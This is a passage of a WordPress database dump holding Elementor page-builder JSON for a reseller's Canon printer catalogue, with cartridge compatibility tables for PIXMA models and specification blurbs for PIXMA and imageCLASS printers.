(Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS307<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5070<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-771 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-771XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-770XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS5170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"736141f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e8521a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS8270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9170<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Photo Blue)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA TS9570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-781 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-781XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-780XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(6853,3292,'_elementor_version','2.5.14'),(6858,3293,'_elementor_template_type','post'),(6859,3293,'_elementor_data','[{\"id\":\"9ac79cf\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"2a109eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"9d59285\",\"elType\":\"widget\",\"settings\":{\"title\":\"Injet Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca9ead8\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"9a9d292\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"align\":\"center\"},\"elements\":[{\"id\":\"6ad8678\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E560 \\/ E560R\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70128a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\",\"id\":2345}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"509ac9b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Advanced Wireless All-In-One with Auto Duplex\\u00a0<span style=\\\"font-size: 0.875rem;\\\">Printing for Low-Cost Printing<\\/span><\\/p><p>The Ink Efficient E560 \\/ E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.<\\/p><p>Available in Black and Red.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO Standard print speed (A4): up to 9.9ipm black \\/ 5.7ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi<\\/p><p>Recommended print volume: 80 - 400 pages<\\/p><p>\\u00a0<\\/p><p>\\u00a0<\\/p><center>[maxbutton id=\\\"11\\\" ]<\\/center><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"19ec1cd\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"d3a1ece\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA E4270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"47167d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\",\"id\":2346}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"c56690e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Compact Wireless All-In-One with Fax and automatic 2-sided printing for Low-Cost Printing\\n\\nThis compact Office All-In-One features a 20-sheet Auto Document Feeder for productivity and delivers up to 400 pages yield with high-capacity ink cartridges.\\n\\nPrint, Scan, Copy, Fax\\n\\nISO standard print speed (A4): 8.8ipm black \\/ 4.4ipm colour\\n\\nHi-speed USB 2.0, WiFi, Mopria, AirPrint, Wireless Direct\\n\\nRecommended print volume: 50 - 200 pages\\n\\n<center><\\/center><center>\\n<span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"11\\\" ]<\\/span><\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"692b43d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a99e262\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS9570\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6a04479\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/099574dcdd504b0cbb4abac1a221c06e_TS95XX_AS_FR_cl_blk_en-v3.3.png\",\"id\":2347}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ab42ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>A3 Wireless Photo Printer with Large 4.3\\u201d Touch-Screen and Auto Document Feeder<\\/p><p>This A3 wireless compact Photo All-In-One printer combines amazing compactness and a wide range of printing options for the complete home and small office printing experience.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, wired LAN, memory card slot, wireless\\/wired LAN PictBridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 80 - 300 pages<\\/p><p>&lt;center&gt;[maxbutton id=\\\"11\\\" ]&lt;\\/center&gt;<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"657c5e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"1c9048c\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA TS8270\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e5da999\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/6d6849f01d6c4e57b1c4a71de1bcd439_TS82XX_AS_SK_op3_blk_en-v1.png\",\"id\":2348}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c06b04\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless Photo All-In-One with Large 4.3\\u201d Touch-Screen and Auto Duplex Printing<\\/p><p>This advanced wireless Photo All-In-One is beautifully designed with a wide range of printing options for the complete home printing experience.<\\/p><p>Available in Black, Red and White.<\\/p><p>Print, Scan, Copy<\\/p><p>ISO standard print speed (A4): up to 15.0ipm black \\/ 10.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, memory card slot, wireless Pictbridge, Mopria, AirPrint, BLE, Wireless Direct<\\/p><p>Recommended print volume: 30 - 100 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e19c5ed\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"48b8328\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"619d0d9\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G2010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b641ed3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/1ae3c86cb64b465c9683e7c860d92b25_PIXMAG2010_1.png\",\"id\":2349}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"cb6e9e3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ef95652\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"72caeea\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G4010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a96790\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/095399e7118a4e898b6df8c1808358de_g4010_03.png\",\"id\":2351}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"bc59f5a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost.<\\/p><p>Print, Scan, Copy and Fax<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, AirPrint, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"49effc0\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"79b85a4\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G1010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4266d0e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7e8a12fd533e44278de28d2734874949_PIXMAG1010_4.png\",\"id\":2352}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"79cfa28\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Printer for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm (mono) \\/ 5.0ipm (colour)<\\/p><p>Photo Speed (4 x 6\\\"): 60sec. (borderless)<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"35746a1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9b7f21a\",\"elType\":\"widget\",\"settings\":{\"title\":\"PIXMA G3010\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b8c2962\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/abbc0420f899426c86b9f547f8e0476d_g3010_01.png\",\"id\":2721}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"ca1fadd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Refillable Ink Tank Wireless All-In-One for High Volume Printing<\\/p><p>Designed for high volume printing at low running cost<\\/p><p>Print, Scan &amp; Copy<\\/p><p>ISO Standard print speed (A4): up to 8.8ipm black \\/ 5.0ipm colour<\\/p><p>Hi-speed USB 2.0, WiFi, Mopria, Access Point Mode<\\/p><p>Recommended print volume: 150 - 1500 pages<\\/p><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1ffb94f\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"84b94b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"130ead1\",\"elType\":\"widget\",\"settings\":{\"title\":\"Laser Printers :-\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"219f45c\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"39c2015\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ece285e\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1273d18\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/74f5403ab44740bc9c8fd1c01ab53d26_LBP113w-1.png\",\"id\":2724}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b60692\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><h4 class=\\\"sub-title\\\">Compact with wireless connectivity<\\/h4><\\/div><p>Simple to operate and compact in size, the ideal choice for your printing needs.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><li>Mobile Connectivity.<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f6acb91\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"001a8d3\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF269dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1a672fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/14e8362b0db44a5daaf2af034760fc58_MF269dw-1.png\",\"id\":2725}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fb9d4fc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Duplex Auto Document Feeder (DADF)<\\/strong><\\/p><\\/div><p>Enjoy greater efficiency. With the duplex auto document feeder, ensure shorter copying and scanning times.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p><\\/div><p>Featuring Network printing and SEND technology, MF266dn is the productive choice for your business operations.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy, Fax<\\/li><li>Print Speed (A4): Up to 28ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 5.2 sec<\\/li><li>Max. paper input capacity: 251 sheets<\\/li><li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p><\\/div><p>Simple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.<\\/p><ul class=\\\"list-normal\\\"><li>Print, Scan, Copy<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>FPOT: Approx. 6.5 sec<\\/li><li>Max. paper input capacity: Up to 150 sheets<\\/li><li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li><\\/ul><p>[maxbutton id=\\\"11\\\" ]<\\/p><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\"><div class=\\\"overview-head\\\"><p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p><\\/div><p>Keep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.<\\/p><ul class=\\\"list-normal\\\"><li>Print<\\/li><li>Print Speed (A4): Up to 22ppm<\\/li><li>Recommended monthly print volume: 250 - 2,500 pages<\\/li><li>First Print Out Time (A4): Approx. 6.5 sec<\\/li><li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 